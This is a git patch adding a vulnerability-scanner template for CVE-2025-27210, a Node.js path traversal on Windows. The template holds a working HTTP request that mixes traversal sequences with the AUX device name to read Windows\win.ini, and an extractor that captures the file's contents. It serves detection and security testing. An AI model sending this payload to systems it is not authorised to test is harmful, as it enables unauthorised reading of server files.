From e4472f9b3609ce0c4400a21233d916877021b161 Mon Sep 17 00:00:00 2001
From: MuhammadWaseem29 <wgujjer11@gmail.com>
Date: Thu, 1 Jan 1970 00:00:00 +0000
Subject: [PATCH] Added template for cve-2025-27210

---
 cve-2025-27210.yaml | 36 ++++++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 cve-2025-27210.yaml

diff --git a/cve-2025-27210.yaml b/cve-2025-27210.yaml
new file mode 100644
index 00000000000..4319d1c3e9c
--- /dev/null
+++ b/cve-2025-27210.yaml
@@ -0,0 +1,36 @@
+id: cve-2025-27210
+info:
+  name: Node.js Windows Path Traversal
+  author: MuhammadWaseem
+  severity: high
+  description: |
+    This template detects a path traversal vulnerability in Node.js on
+    Windows systems (CVE-2025-27210) by exploiting reserved device file
+    names combined with traversal sequences.
+  tags: path-traversal,windows,nodejs,vulnerability
+
+variables:
+  traverse_sequence: "../..\\" # Windows-style path traversal
+  target_file: "Windows\\win.ini"
+
+http:
+  - raw:
+      - |
+        GET /{{traverse_sequence}}AUX\\..\\{{target_file}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        part: body
+        regex:
+          - "(?i)\\[windows\\]" # Matches content indicating the win.ini file
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(?s)(\\[windows\\].*?)\\n\\n" # Extracts the content of the win.ini file
+        group: 1